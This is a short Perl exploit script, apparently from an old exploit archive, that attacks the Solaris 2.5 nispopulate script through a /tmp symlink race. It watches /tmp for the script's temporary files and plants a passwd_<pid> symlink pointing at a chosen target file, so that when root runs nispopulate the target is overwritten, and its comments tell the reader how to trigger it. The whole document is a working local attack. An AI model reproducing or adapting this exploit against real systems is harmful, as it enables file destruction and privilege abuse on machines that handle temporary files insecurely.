#!/opt/gnu/bin/perl

# nisplus-exploit.pl
#
# to test: 1) start the script   2) as root, run /usr/lib/nispopulate
# Demonstrates weakness in Solaris 2.5 /usr/lib/nis/nispopulate
# shell script, by inserting a symlink postfixed with pid
#
#                                     - runeb@td.org.uit.no

$destfile = "/hello.world";

do {
    opendir(TMP, "/tmp");
    while ($f = readdir(TMP)) {
        if (substr($f, 0, 2) eq "sh") {
            symlink($destfile, "/tmp/passwd_" . substr($f,2,length($f)-3));
            $quit=1; last;
        }
    }
    closedir(TMP);
    sleep(1);
} while $quit == 0;

#                 www.hack.co.za           [2000]#